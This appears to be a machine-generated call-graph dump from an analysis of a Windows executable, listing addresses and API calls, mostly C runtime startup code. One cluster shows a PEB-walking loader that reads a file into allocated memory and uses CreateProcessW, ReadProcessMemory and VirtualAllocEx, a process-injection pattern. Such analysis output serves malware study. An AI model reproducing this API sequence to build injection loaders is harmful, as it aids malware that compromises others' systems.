LeaveCriticalSection 7900->7962 7902 b55822 7902->7866 7904 b57bf0 7903->7904 7905 b57bdc 7903->7905 7906 b57bec 7904->7906 7922 b5586a 7904->7922 7907 b51cc3 __cftof_l 58 API calls 7905->7907 7919 b57ca8 7906->7919 7909 b57be1 7907->7909 7911 b51e89 __cftof_l 9 API calls 7909->7911 7911->7906 7914 b52873 __filbuf 58 API calls 7915 b57c0a 7914->7915 7932 b588a3 7915->7932 7917 b57c10 7917->7906 7918 b54831 _free 58 API calls 7917->7918 7918->7906 7920 b51fcd __wfsopen 2 API calls 7919->7920 7921 b57cae 7920->7921 7921->7893 7923 b5587d 7922->7923 7927 b558a1 7922->7927 7924 b52873 __filbuf 58 API calls 7923->7924 7923->7927 7925 b5589a 7924->7925 7926 b57d99 __write 78 API calls 7925->7926 7926->7927 7928 b5914b 7927->7928 7929 b59158 7928->7929 7931 b57c04 7928->7931 7930 b54831 _free 58 API calls 7929->7930 7929->7931 7930->7931 7931->7914 7933 b588af __freefls@4 7932->7933 7934 b588bc 7933->7934 7937 b588d3 7933->7937 7935 b51c8f __chsize_nolock 58 API calls 7934->7935 7938 b588c1 7935->7938 7936 b5895e 7940 b51c8f __chsize_nolock 58 API calls 7936->7940 7937->7936 7939 b588e3 7937->7939 7942 b51cc3 __cftof_l 58 API calls 7938->7942 7943 b58901 7939->7943 7944 b5890b 7939->7944 7941 b58906 7940->7941 7947 b51cc3 __cftof_l 58 API calls 7941->7947 7954 b588c8 __freefls@4 7942->7954 7945 b51c8f __chsize_nolock 58 API calls 7943->7945 7946 b56c88 ___lock_fhandle 59 API calls 7944->7946 7945->7941 7948 b58911 7946->7948 7949 b5896a 7947->7949 7950 b58924 7948->7950 7951 b5892f 7948->7951 7952 b51e89 __cftof_l 9 API calls 7949->7952 7953 b5897e __close_nolock 61 API calls 7950->7953 7955 b51cc3 __cftof_l 58 API calls 7951->7955 7952->7954 7956 b5892a 7953->7956 7954->7917 7955->7956 7958 b58956 7956->7958 7961 b5702e LeaveCriticalSection 7958->7961 7960 b5895c 7960->7954 7961->7960 7962->7902 8401 b57577 8402 b517be __lock 58 API calls 8401->8402 8403 b5757e 8402->8403 8404 b546f1 8405 b54869 __calloc_crt 58 API calls 8404->8405 8406 b546fb EncodePointer 8405->8406 8407 b54714 8406->8407 8408 b56470 RtlUnwind 8409 b533fc 8410 b53431 8409->8410 8411 b5340c 8409->8411 8411->8410 8416 b54961 8411->8416 8417 b5496d __freefls@4 8416->8417 8418 b536db __write_nolock 58 API calls 8417->8418 8419 b54972 8418->8419 8420 b57580 _abort 62 API calls 8419->8420 8421 b54994 8420->8421 7963 b59624 7964 b5962c __cfltcvt_init 7963->7964 7965 b59637 7964->7965 7967 b5b3ca 7964->7967 7973 b5c2af 7967->7973 7969 b5b3dd 7970 b5b3e4 7969->7970 7971 b51e99 __invoke_watson 8 API calls 7969->7971 7970->7965 7972 b5b3f0 7971->7972 7974 b5c2cb __control87 7973->7974 7978 b5c2eb __control87 7973->7978 7975 b51cc3 __cftof_l 58 API calls 7974->7975 7976 b5c2e1 7975->7976 7977 b51e89 __cftof_l 9 API calls 7976->7977 7977->7978 7978->7969 8422 b516e7 8423 b516f6 8422->8423 8424 b516fc 8422->8424 8425 b5187c _raise 58 API calls 8423->8425 8428 b517da 8424->8428 8425->8424 8427 b51701 __freefls@4 8429 b51932 _doexit 58 API calls 8428->8429 8430 b517e5 8429->8430 8430->8427 7979 b535a6 7980 b535b2 __freefls@4 7979->7980 7981 b535cb 7980->7981 7982 b536ba __freefls@4 7980->7982 7983 b54831 _free 58 API calls 7980->7983 7984 b54831 _free 58 API calls 7981->7984 7987 b535da 7981->7987 7983->7981 7984->7987 7985 b535e9 7986 b535f8 7985->7986 7989 b54831 _free 58 API calls 7985->7989 7990 b53607 7986->7990 7991 b54831 _free 58 API calls 7986->7991 7987->7985 7988 b54831 _free 58 API calls 7987->7988 7988->7985 7989->7986 7992 b53616 7990->7992 7993 b54831 _free 58 API calls 7990->7993 7991->7990 7994 b53625 7992->7994 7996 b54831 _free 58 API calls 7992->7996 7993->7992 7995 b53637 7994->7995 7997 b54831 _free 58 API calls 7994->7997 7998 b5442f __lock 58 API calls 7995->7998 7996->7994 7997->7995 8001 b5363f 7998->8001 7999 b53662 8011 b536c6 7999->8011 8001->7999 8003 b54831 _free 58 API calls 8001->8003 8003->7999 8004 b5442f __lock 58 API calls 8009 b53676 ___removelocaleref 8004->8009 8005 b536a7 8014 b536d2 8005->8014 8008 b54831 _free 58 API calls 8008->7982 8009->8005 8010 b5715c ___freetlocinfo 58 API calls 8009->8010 8010->8005 8017 b54599 LeaveCriticalSection 8011->8017 8013 b5366f 8013->8004 8018 b54599 LeaveCriticalSection 8014->8018 8016 b536b4 8016->8008 8017->8013 8018->8016 8431 b52460 8432 b52497 8431->8432 8433 b5248a 8431->8433 8435 b55770 __cftof_l 6 API calls 8432->8435 8434 b55770 __cftof_l 6 API calls 8433->8434 8434->8432 8438 b524a7 __except_handler4 8435->8438 8436 b525bf 8437 b525af 8441 b55770 __cftof_l 6 API calls 8437->8441 8438->8436 8439 b52574 __except_handler4 8438->8439 8443 b524fe __IsNonwritableInCurrentImage 8438->8443 8439->8436 8439->8437 8440 b55770 __cftof_l 6 API calls 8439->8440 8440->8437 8441->8436 8449 b52722 RtlUnwind 8443->8449 8444 b525d6 8446 b55770 __cftof_l 6 API calls 8444->8446 8445 b5253c __except_handler4 8445->8444 8447 b55770 __cftof_l 6 API calls 8445->8447 8448 b525e6 __except_handler4 8446->8448 8447->8444 8449->8445 7747 110809 7759 1106f7 GetPEB 7747->7759 7749 11086e 7750 1109b8 CreateFileW 7749->7750 7751 1109dd 7750->7751 7752 1109df 7750->7752 7752->7751 7753 1109f2 VirtualAlloc 7752->7753 7753->7751 7754 110a0c ReadFile 7753->7754 7754->7751 7755 110a24 CloseHandle 7754->7755 7756 110a35 7755->7756 7760 110f3b 7756->7760 7759->7749 7774 1106f7 GetPEB 7760->7774 7762 110f92 7763 11107d 7762->7763 7765 11108a 7762->7765 7773 110a40 ExitProcess 7762->7773 7775 111261 7763->7775 7765->7773 7794 110261 7765->7794 7767 111190 7768 1111fd 7767->7768 7769 110261 4 API calls 7767->7769 7767->7773 7770 110261 4 API calls 7768->7770 7769->7767 7771 11121c 7770->7771 7771->7773 7803 1101b2 7771->7803 7774->7762 7812 1106f7 GetPEB 7775->7812 7777 11126f 7778 11139d CreateProcessW 7777->7778 7793 111378 7777->7793 7779 1113b4 7778->7779 7778->7793 7780 1113d7 ReadProcessMemory 7779->7780 7779->7793 7781 1113fb 7780->7781 7780->7793 7782 11142e VirtualAllocEx 7781->7782 7813 110360 7781->7813 7783 111458 7782->7783 7782->7793 7785 110261 4 API calls 7783->7785 7787 11146e 7785->7787 7786 111422 7786->7782 7786->7793 7788 1114c8 7787->7788 7789 110261 4 API calls 7787->7789 7787->7793 7790 110261 4 API calls 7788->7790 7789->7787 7791 1114e2 7790->7791 7792 1101b2 4 API calls 7791->7792 7791->7793 7792->7793 7793->7773 7795 11027c 7794->7795 7796 110736 GetPEB 7795->7796 7797 11029d 7796->7797 7798 1102a5 7797->7798 7799 11032f 7797->7799 7801 1103f8 3 API calls 7798->7801 7837 11017c 7799->7837 7802 110316 7801->7802 7802->7767 7804 1101cd 7803->7804 7805 110736 GetPEB 7804->7805 7806 1101ee 7805->7806 7807 1101f2 7806->7807 7808 110238 7806->7808 7809 1103f8 3 API calls 7807->7809 7840 11018e 7808->7840 7811 11022d 7809->7811 7811->7773 7812->7777 7814 110373 7813->7814 7822 110736 GetPEB 7814->7822 7816 110394 7817 110398 7816->7817 7818 1103de 7816->7818 7824 1103f8 GetPEB 7817->7824 7828 1101a0 7818->7828 7821 1103d3 7821->7786 7823 110759 7822->7823 7823->7816 7825 11045d 7824->7825 7831 110772 GetPEB 7825->7831 7827 1104da 7827->7821 7829 1103f8 3 API calls 7828->7829 7830 1101aa 7829->7830 7830->7821 7832 110785 7831->7832 7834 110799 7832->7834 7835 11061d GetPEB 7832->7835 7834->7827 7836 11064d 7835->7836 7836->7832 7838 1103f8 3 API calls 7837->7838 7839 110186 7838->7839 7839->7802 7841 1103f8 3 API calls 7840->7841 7842 110198 7841->7842 7842->7811 8019 b5a92c 8022 b5a94d 8019->8022 8021 b5a948 8023 b5a9b7 8022->8023 8024 b5a958 8022->8024 8090 b5ae9e 8023->8090 8024->8023 8026 b5a95d 8024->8026 8028 b5a962 8026->8028 8029 b5a97b 8026->8029 8027 b5a99c 8027->8021 8036 b5b058 8028->8036 8031 b5a99e 8029->8031 8034 b5a985 8029->8034 8077 b5a9d3 8031->8077 8055 b5b119 8034->8055 8107 b5c11f 8036->8107 8039 b5b09d 8042 b5b0b5 8039->8042 8043 b5b0a5 8039->8043 8040 b5b08d 8041 b51cc3 __cftof_l 58 API calls 8040->8041 8044 b5b092 8041->8044 8119 b5bfa7 8042->8119 8045 b51cc3 __cftof_l 58 API calls 8043->8045 8046 b51e89 __cftof_l 9 API calls 8044->8046 8047 b5b0aa 8045->8047 8051 b5b099 8046->8051 8050 b51e89 __cftof_l 9 API calls 8047->8050 8049 b5b0e8 8049->8051 8128 b5af6c 8049->8128 8050->8051 8053 b55770 __cftof_l 6 API calls 8051->8053 8054 b5a976 8053->8054 8054->8021 8056 b5c11f __fltout2 58 API calls 8055->8056 8057 b5b147 8056->8057 8058 b5b161 8057->8058 8059 b5b14e 8057->8059 8061 b5b17c 8058->8061 8062 b5b169 8058->8062 8060 b51cc3 __cftof_l 58 API calls 8059->8060 8064 b5b153 8060->8064 8066 b5bfa7 __fptostr 58 API calls 8061->8066 8063 b51cc3 __cftof_l 58 API calls 8062->8063 8065 b5b16e 8063->8065 8067 b51e89 __cftof_l 9 API calls 8064->8067 8068 b51e89 __cftof_l 9 API calls 8065->8068 8069 b5b1a8 8066->8069 8070 b5b15a 8067->8070 8068->8070 8069->8070 8072 b5b1ee 8069->8072 8075 b5b1c8 8069->8075 8071 b55770 __cftof_l 6 API calls 8070->8071 8074 b5b214 8071->8074 8157 b5ad4d 8072->8157 8074->8027 8076 b5af6c __cftof2_l 58 API calls 8075->8076 8076->8070 8078 b54bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8077->8078 8079 b5a9f8 8078->8079 8080 b5aa0f 8079->8080 8081 b5aa18 8079->8081 8082 b51cc3 __cftof_l 58 API calls 8080->8082 8084 b5aa21 8081->8084 8087 b5aa35 8081->8087 8083 b5aa14 8082->8083 8086 b51e89 __cftof_l 9 API calls 8083->8086 8085 b51cc3 __cftof_l 58 API calls 8084->8085 8085->8083 8089 b5aa30 _memset __alldvrm __cftoa_l _strrchr 8086->8089 8087->8089 8189 b5ad2f 8087->8189 8089->8027 8091 b5c11f __fltout2 58 API calls 8090->8091 8092 b5aed0 8091->8092 8093 b5aee7 8092->8093 8094 b5aed7 8092->8094 8096 b5aeee 8093->8096 8097 b5aef8 8093->8097 8095 b51cc3 __cftof_l 58 API calls 8094->8095 8101 b5aedc 8095->8101 8098 b51cc3 __cftof_l 58 API calls 8096->8098 8099 b5bfa7 __fptostr 58 API calls 8097->8099 8098->8101 8102 b5af38 8099->8102 8100 b51e89 __cftof_l 9 API calls 8103 b5aee3 8100->8103 8101->8100 8102->8103 8104 b5ad4d __cftoe2_l 58 API calls 8102->8104 8105 b55770 __cftof_l 6 API calls 8103->8105 8104->8103 8106 b5af68 8105->8106 8106->8027 8108 b5c148 ___dtold 8107->8108 8135 b5c3bd 8108->8135 8113 b5c1a0 8116 b51e99 __invoke_watson 8 API calls 8113->8116 8114 b5c18a 8115 b55770 __cftof_l 6 API calls 8114->8115 8117 b5b086 8115->8117 8118 b5c1ac 8116->8118 8117->8039 8117->8040 8120 b5bfcf 8119->8120 8121 b5bfb9 8119->8121 8120->8121 8125 b5bfd5 8120->8125 8122 b51cc3 __cftof_l 58 API calls 8121->8122 8123 b5bfbe 8122->8123 8124 b51e89 __cftof_l 9 API calls 8123->8124 8127 b5bfc8 _memmove _strlen 8124->8127 8126 b51cc3 __cftof_l 58 API calls 8125->8126 8125->8127 8126->8123 8127->8049 8129 b54bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8128->8129 8130 b5af89 8129->8130 8131 b51cc3 __cftof_l 58 API calls 8130->8131 8134 b5afa5 _memset __shift 8130->8134 8132 b5af9b 8131->8132 8133 b51e89 __cftof_l 9 API calls 8132->8133 8133->8134 8134->8051 8138 b5c412 8135->8138 8136 b5c484 8139 b5b7bd _$I10_OUTPUT 58 API calls 8136->8139 8137 b55770 __cftof_l 6 API calls 8140 b5c163 8137->8140 8138->8136 8141 b5c424 8138->8141 8142 b5c49d 8138->8142 8139->8141 8148 b5b7bd 8140->8148 8143 b5c435 8141->8143 8147 b5cd59 8141->8147 8145 b5b7bd _$I10_OUTPUT 58 API calls 8142->8145 8143->8137 8144 b51e99 __invoke_watson 8 API calls 8146 b5cd90 8144->8146 8145->8141 8147->8144 8149 b5b7d6 8148->8149 8150 b5b7c8 8148->8150 8151 b51cc3 __cftof_l 58 API calls 8149->8151 8150->8149 8155 b5b7ec 8150->8155 8152 b5b7dd 8151->8152 8153 b51e89 __cftof_l 9 API calls 8152->8153 8154 b5b7e7 8153->8154 8154->8113 8154->8114 8155->8154 8156 b51cc3 __cftof_l 58 API calls 8155->8156 8156->8152 8158 b54bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8157->8158 8159 b5ad60 8158->8159 8160 b5ad6d 8159->8160 8161 b5ad76 8159->8161 8162 b51cc3 __cftof_l 58 API calls 8160->8162 8164 b5ad8b 8161->8164 8167 b5ad9f __shift 8161->8167 8163 b5ad72 8162->8163 8166 b51e89 __cftof_l 9 API calls 8163->8166 8165 b51cc3 __cftof_l 58 API calls 8164->8165 8165->8163 8170 b5ad9a _memmove 8166->8170 8168 b5b7bd _$I10_OUTPUT 58 API calls 8167->8168 8169 b5ae16 8168->8169 8169->8170 8171 b51e99 __invoke_watson 8 API calls 8169->8171 8170->8070 8172 b5ae9d 8171->8172 8173 b5c11f __fltout2 58 API calls 8172->8173 8174 b5aed0 8173->8174 8175 b5aee7 8174->8175 8176 b5aed7 8174->8176 8178 b5aeee 8175->8178 8179 b5aef8 8175->8179 8177 b51cc3 __cftof_l 58 API calls 8176->8177 8180 b5aedc 8177->8180 8181 b51cc3 __cftof_l 58 API calls 8178->8181 8182 b5bfa7 __fptostr 58 API calls 8179->8182 8183 b51e89 __cftof_l 9 API calls 8180->8183 8181->8180 8184 b5af38 8182->8184 8185 b5aee3 8183->8185 8184->8185 8186 b5ad4d __cftoe2_l 58 API calls 8184->8186 8187 b55770 __cftof_l 6 API calls 8185->8187 8186->8185 8188 b5af68 8187->8188 8188->8070 8190 b5ae9e __cftoe_l 58 API calls 8189->8190 8191 b5ad48 8190->8191 8191->8089 8192 b5b2a9 8195 b5b2c1 8192->8195 8196 b5b2d2 8195->8196 8197 b5b2eb 8195->8197 8201 b59549 8196->8201 8210 b595d7 8197->8210 8200 b5b2bc 8202 b54bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8201->8202 8203 b5956d 8202->8203 8213 b5a184 8203->8213 8208 b55770 __cftof_l 6 API calls 8209 b595d3 8208->8209 8209->8200 8225 b594a5 8210->8225 8214 b5a1cc 8213->8214 8220 b5a1dc ___mtold12 8213->8220 8215 b51cc3 __cftof_l 58 API calls 8214->8215 8216 b5a1d1 8215->8216 8217 b51e89 __cftof_l 9 API calls 8216->8217 8217->8220 8218 b55770 __cftof_l 6 API calls 8219 b59585 8218->8219 8221 b596a0 8219->8221 8220->8218 8224 b596f8 8221->8224 8222 b55770 __cftof_l 6 API calls 8223 b59592 8222->8223 8223->8208 8224->8222 8226 b54bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8225->8226 8227 b594d2 8226->8227 8228 b5a184 ___strgtold12_l 58 API calls 8227->8228 8229 b594ea 8228->8229 8234 b59c12 8229->8234 8232 b55770 __cftof_l 6 API calls 8233 b59545 8232->8233 8233->8200 8237 b59c6a 8234->8237 8235 b55770 __cftof_l 6 API calls 8236 b59507 8235->8236 8236->8232 8237->8235 8238 b52690 8239 b526b0 @_EH4_CallFilterFunc@8 8238->8239 8240 b526a2 8238->8240 8241 b55770 __cftof_l 6 API calls 8240->8241 8241->8239 8450 b593d0 8451 b593e6 8450->8451 8452 b593da 8450->8452 8452->8451 8453 b593df CloseHandle 8452->8453 8453->8451 8454 b516d3 8457 b5344b 8454->8457 8458 b536f3 __getptd_noexit 58 API calls 8457->8458 8459 b516e4 8458->8459 8460 b54bdf 8463 b54fc3 8460->8463 8462 b54bee 8464 b54fcf __freefls@4 8463->8464 8465 b536db __write_nolock 58 API calls 8464->8465 8466 b54fd7 8465->8466 8467 b54f1d __setmbcp 58 API calls 8466->8467 8468 b54fe1 8467->8468 8488 b54cbe 8468->8488 8471 b548b1 __malloc_crt 58 API calls 8472 b55003 8471->8472 8473 b55130 __freefls@4 8472->8473 8495 b5516b 8472->8495 8473->8462 8476 b55140 8476->8473 8480 b54831 _free 58 API calls 8476->8480 8483 b55153 8476->8483 8477 b55039 8478 b54831 _free 58 API calls 8477->8478 8479 b55059 8477->8479 8478->8479 8479->8473 8482 b5442f __lock 58 API calls 8479->8482 8480->8483 8481 b51cc3 __cftof_l 58 API calls 8481->8473 8484 b55088 8482->8484 8483->8481 8485 b55116 8484->8485 8487 b54831 _free 58 API calls 8484->8487 8505 b55135 8485->8505 8487->8485 8489 b54bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8488->8489 8490 b54cce 8489->8490 8491 b54cdd GetOEMCP 8490->8491 8492 b54cef 8490->8492 8494 b54d06 8491->8494 8493 b54cf4 GetACP 8492->8493 8492->8494 8493->8494 8494->8471 8494->8473 8496 b54cbe getSystemCP 60 API calls 8495->8496 8497 b55188 8496->8497 8500 b551d9 IsValidCodePage 8497->8500 8502 b5518f setSBCS 8497->8502 8504 b551fe _memset __setmbcp_nolock 8497->8504 8498 b55770 __cftof_l 6 API calls 8499 b5502a 8498->8499 8499->8476 8499->8477 8501 b551eb GetCPInfo 8500->8501 8500->8502 8501->8502 8501->8504 8502->8498 8508 b54d8b GetCPInfo 8504->8508 8518 b54599 LeaveCriticalSection 8505->8518 8507 b5513c 8507->8473 8509 b54e6d 8508->8509 8515 b54dc3 8508->8515 8512 b55770 __cftof_l 6 API calls 8509->8512 8510 b57a55 ___crtGetStringTypeA 61 API calls 8511 b54e24 8510->8511 8513 b57917 ___crtLCMapStringA 62 API calls 8511->8513 8514 b54f19 8512->8514 8516 b54e45 8513->8516 8514->8502 8515->8510 8517 b57917 ___crtLCMapStringA 62 API calls 8516->8517 8517->8509 8518->8507 8252 b54985 8253 b54988 8252->8253 8256 b57580 8253->8256 8267 b549b3 DecodePointer 8256->8267 8258 b57585 8259 b57590 8258->8259 8268 b549dc 8258->8268 8261 b5759a IsProcessorFeaturePresent 8259->8261 8266 b575b8 8259->8266 8263 b575a5 8261->8263 8262 b5187c _raise 58 API calls 8264 b575c2 8262->8264 8265 b51d2c __call_reportfault 7 API calls 8263->8265 8265->8266 8266->8262 8267->8258 8271 b549e8 __freefls@4 8268->8271 8269 b54a52 8270 b54a2f DecodePointer 8269->8270 8275 b54a61 8269->8275 8276 b54a1e _siglookup 8270->8276 8271->8269 8271->8270 8272 b54a19 8271->8272 8278 b54a15 8271->8278 8273 b536f3 __getptd_noexit 58 API calls 8272->8273 8273->8276 8277 b51cc3 __cftof_l 58 API calls 8275->8277 8280 b54abf 8276->8280 8281 b5187c _raise 58 API calls 8276->8281 8288 b54a27 __freefls@4 8276->8288 8279 b54a66 8277->8279 8278->8272 8278->8275 8282 b51e89 __cftof_l 9 API calls 8279->8282 8283 b5442f __lock 58 API calls 8280->8283 8285 b54aca 8280->8285 8281->8280 8282->8288 8283->8285 8284 b54b2c EncodePointer 8286 b54aff 8284->8286 8285->8284 8285->8286 8289 b54b5d 8286->8289 8288->8259 8290 b54b61 8289->8290 8291 b54b68 8289->8291 8293 b54599 LeaveCriticalSection 8290->8293 8291->8288 8293->8291 6502 b515c0 6503 b515cc __freefls@4 6502->6503 6539 b5407f GetStartupInfoW 6503->6539 6506 b515d1 6541 b51d17 GetProcessHeap 6506->6541 6507 b51629 6508 b51634 6507->6508 6621 b51710 6507->6621 6542 b53815 6508->6542 6511 b5163a 6512 b51645 __RTC_Initialize 6511->6512 6513 b51710 _fast_error_exit 58 API calls 6511->6513 6563 b538a8 6512->6563 6513->6512 6515 b51654 6516 b51660 GetCommandLineW 6515->6516 6517 b51710 _fast_error_exit 58 API calls 6515->6517 6582 b53fa4 GetEnvironmentStringsW 6516->6582 6519 b5165f 6517->6519 6519->6516 6522 b5167a 6523 b51685 6522->6523 6629 b517be 6522->6629 6592 b53d99 6523->6592 6526 b5168b 6527 b51696 6526->6527 6528 b517be __lock 58 API calls 6526->6528 6606 b517f8 6527->6606 6528->6527 6530 b5169e 6531 b516a9 __wwincmdln 6530->6531 6532 b517be __lock 58 API calls 6530->6532 6612 b51000 6531->6612 6532->6531 6535 b516cc 6639 b517e9 6535->6639 6538 b516d1 __freefls@4 6540 b54095 6539->6540 6540->6506 6541->6507 6642 b51890 RtlEncodePointer 6542->6642 6544 b5381a 6648 b54560 6544->6648 6546 b53823 6652 b5388b 6546->6652 6552 b53840 6664 b54869 6552->6664 6555 b53882 6557 b5388b __mtterm 61 API calls 6555->6557 6559 b53887 6557->6559 6558 b53861 6558->6555 6560 b53867 6558->6560 6559->6511 6673 b53762 6560->6673 6562 b5386f GetCurrentThreadId 6562->6511 6564 b538b4 __freefls@4 6563->6564 6565 b5442f __lock 58 API calls 6564->6565 6566 b538bb 6565->6566 6567 b54869 __calloc_crt 58 API calls 6566->6567 6569 b538cc 6567->6569 6568 b53937 GetStartupInfoW 6576 b5394c 6568->6576 6577 b53a7b 6568->6577 6569->6568 6570 b538d7 @_EH4_CallFilterFunc@8 __freefls@4 6569->6570 6570->6515 6571 b53b43 6937 b53b53 6571->6937 6573 b54869 __calloc_crt 58 API calls 6573->6576 6574 b53ac8 GetStdHandle 6574->6577 6575 b53adb GetFileType 6575->6577 6576->6573 6576->6577 6578 b5399a 6576->6578 6577->6571 6577->6574 6577->6575 6581 b540a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6577->6581 6578->6577 6579 b539ce GetFileType 6578->6579 6580 b540a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6578->6580 6579->6578 6580->6578 6581->6577 6583 b53fb5 6582->6583 6584 b51670 6582->6584 6585 b548b1 __malloc_crt 58 API calls 6583->6585 6588 b53b5c GetModuleFileNameW 6584->6588 6587 b53fdb _memmove 6585->6587 6586 b53ff1 FreeEnvironmentStringsW 6586->6584 6587->6586 6589 b53b90 _wparse_cmdline 6588->6589 6590 b548b1 __malloc_crt 58 API calls 6589->6590 6591 b53bd0 _wparse_cmdline 6589->6591 6590->6591 6591->6522 6593 b53db2 __NMSG_WRITE 6592->6593 6597 b53daa 6592->6597 6594 b54869 __calloc_crt 58 API calls 6593->6594 6602 b53ddb __NMSG_WRITE 6594->6602 6595 b53e32 6596 b54831 _free 58 API calls 6595->6596 6596->6597 6597->6526 6598 b54869 __calloc_crt 58 API calls 6598->6602 6599 b53e57 6601 b54831 _free 58 API calls 6599->6601 6600 b55457 __NMSG_WRITE 58 API calls 6600->6602 6601->6597 6602->6595 6602->6597 6602->6598 6602->6599 6602->6600 6603 b53e6e 6602->6603 6604 b51e99 __invoke_watson 8 API calls 6603->6604 6605 b53e7a 6604->6605 6605->6526 6608 b51804 __IsNonwritableInCurrentImage 6606->6608 6941 b54942 6608->6941 6609 b51822 __initterm_e 6611 b51841 _doexit __IsNonwritableInCurrentImage 6609->6611 6944 b5481c 6609->6944 6611->6530 6613 b5114d _malloc 58 API calls 6612->6613 6614 b51013 6613->6614 7010 b511df 6614->7010 6618 b5108a 6618->6535 6636 b51a61 6618->6636 6619 b5104d _memset 6619->6618 6620 b51081 EnumSystemCodePagesW 6619->6620 6620->6618 6622 b51721 6621->6622 6623 b5171c 6621->6623 6625 b51ad2 __NMSG_WRITE 58 API calls 6622->6625 6624 b51a75 __FF_MSGBANNER 58 API calls 6623->6624 6624->6622 6626 b51729 6625->6626 6627 b517a8 _doexit 3 API calls 6626->6627 6628 b51733 6627->6628 6628->6508 6630 b51a75 __FF_MSGBANNER 58 API calls 6629->6630 6631 b517c6 6630->6631 6632 b51ad2 __NMSG_WRITE 58 API calls 6631->6632 6633 b517ce 6632->6633 7717 b5187c 6633->7717 6637 b51932 _doexit 58 API calls 6636->6637 6638 b51a70 6637->6638 6638->6535 6640 b51932 _doexit 58 API calls 6639->6640 6641 b517f4 6640->6641 6641->6538 6683 b51767 6642->6683 6644 b518a1 __init_pointers __initp_misc_winsig 6684 b54995 EncodePointer 6644->6684 6646 b518b9 __init_pointers 6647 b54110 34 API calls 6646->6647 6647->6544 6649 b5456c 6648->6649 6651 b5381f 6649->6651 6685 b540a2 6649->6685 6651->6546 6661 b54001 6651->6661 6653 b53895 6652->6653 6655 b5389b 6652->6655 6688 b5401f 6653->6688 6656 b54479 DeleteCriticalSection 6655->6656 6657 b54495 6655->6657 6691 b54831 6656->6691 6659 b544a1 DeleteCriticalSection 6657->6659 6660 b53828 6657->6660 6659->6657 6660->6511 6662 b53835 6661->6662 6663 b54018 TlsAlloc 6661->6663 6662->6546 6662->6552 6665 b54870 6664->6665 6667 b5384d 6665->6667 6669 b5488e 6665->6669 6717 b574fd 6665->6717 6667->6555 6670 b5405d 6667->6670 6669->6665 6669->6667 6725 b543a9 Sleep 6669->6725 6671 b54077 TlsSetValue 6670->6671 6672 b54073 6670->6672 6671->6558 6672->6558 6674 b5376e __freefls@4 6673->6674 6728 b5442f 6674->6728 6676 b537ab 6735 b53803 6676->6735 6679 b5442f __lock 58 API calls 6680 b537cc ___addlocaleref 6679->6680 6738 b5380c 6680->6738 6682 b537f7 __freefls@4 6682->6562 6683->6644 6684->6646 6686 b540b2 6685->6686 6687 b540bf InitializeCriticalSectionAndSpinCount 6685->6687 6686->6649 6687->6649 6689 b54036 TlsFree 6688->6689 6690 b54032 6688->6690 6689->6655 6690->6655 6692 b5483a HeapFree 6691->6692 6696 b54863 _free 6691->6696 6693 b5484f 6692->6693 6692->6696 6697 b51cc3 6693->6697 6696->6655 6700 b536f3 GetLastError 6697->6700 6699 b51cc8 GetLastError 6699->6696 6714 b5403e 6700->6714 6702 b53708 6703 b53756 SetLastError 6702->6703 6704 b54869 __calloc_crt 55 API calls 6702->6704 6703->6699 6705 b5371b 6704->6705 6705->6703 6706 b5405d __getptd_noexit TlsSetValue 6705->6706 6707 b5372f 6706->6707 6708 b53735 6707->6708 6709 b5374d 6707->6709 6710 b53762 __initptd 55 API calls 6708->6710 6711 b54831 _free 55 API calls 6709->6711 6713 b5373d GetCurrentThreadId 6710->6713 6712 b53753 6711->6712 6712->6703 6713->6703 6715 b54055 TlsGetValue 6714->6715 6716 b54051 6714->6716 6715->6702 6716->6702 6718 b57523 6717->6718 6719 b57508 6717->6719 6721 b57533 HeapAlloc 6718->6721 6723 b57519 6718->6723 6726 b51741 DecodePointer 6718->6726 6719->6718 6720 b57514 6719->6720 6722 b51cc3 __cftof_l 57 API calls 6720->6722 6721->6718 6721->6723 6722->6723 6723->6665 6725->6669 6727 b51754 6726->6727 6727->6718 6729 b54440 6728->6729 6730 b54453 EnterCriticalSection 6728->6730 6741 b544b7 6729->6741 6730->6676 6732 b54446 6732->6730 6733 b517be __lock 57 API calls 6732->6733 6734 b54452 6733->6734 6734->6730 6935 b54599 LeaveCriticalSection 6735->6935 6737 b537c5 6737->6679 6936 b54599 LeaveCriticalSection 6738->6936 6740 b53813 6740->6682 6742 b544c3 __freefls@4 6741->6742 6743 b544e4 6742->6743 6744 b544cc 6742->6744 6753 b54505 __freefls@4 6743->6753 6807 b548b1 6743->6807 6765 b51a75 6744->6765 6751 b54500 6756 b51cc3 __cftof_l 58 API calls 6751->6756 6752 b5450f 6754 b5442f __lock 58 API calls 6752->6754 6753->6732 6757 b54516 6754->6757 6756->6753 6759 b54523 6757->6759 6760 b5453b 6757->6760 6761 b540a2 __mtinitlocks InitializeCriticalSectionAndSpinCount 6759->6761 6762 b54831 _free 58 API calls 6760->6762 6763 b5452f 6761->6763 6762->6763 6813 b54557 6763->6813 6816 b53e88 6765->6816 6767 b51a7c 6768 b53e88 __NMSG_WRITE 58 API calls 6767->6768 6771 b51a89 6767->6771 6768->6771 6769 b51ad2 __NMSG_WRITE 58 API calls 6770 b51aa1 6769->6770 6772 b51ad2 __NMSG_WRITE 58 API calls 6770->6772 6771->6769 6773 b51aab 6771->6773 6772->6773 6774 b51ad2 6773->6774 6775 b51af0 __NMSG_WRITE 6774->6775 6777 b53e88 __NMSG_WRITE 55 API calls 6775->6777 6803 b51c17 6775->6803 6779 b51b03 6777->6779 6778 b51c80 6804 b517a8 6778->6804 6780 b51c1c GetStdHandle 6779->6780 6781 b53e88 __NMSG_WRITE 55 API calls 6779->6781 6784 b51c2a _strlen 6780->6784 6780->6803 6782 b51b14 6781->6782 6782->6780 6783 b51b26 6782->6783 6783->6803 6846 b55457 6783->6846 6787 b51c63 WriteFile 6784->6787 6784->6803 6787->6803 6788 b51c84 6791 b51e99 __invoke_watson 8 API calls 6788->6791 6789 b51b53 GetModuleFileNameW 6790 b51b73 6789->6790 6795 b51b83 __NMSG_WRITE 6789->6795 6792 b55457 __NMSG_WRITE 55 API calls 6790->6792 6793 b51c8e 6791->6793 6792->6795 6794 b51bc9 6794->6788 6864 b553eb 6794->6864 6795->6788 6795->6794 6855 b554cc 6795->6855 6799 b553eb __NMSG_WRITE 55 API calls 6800 b51c00 6799->6800 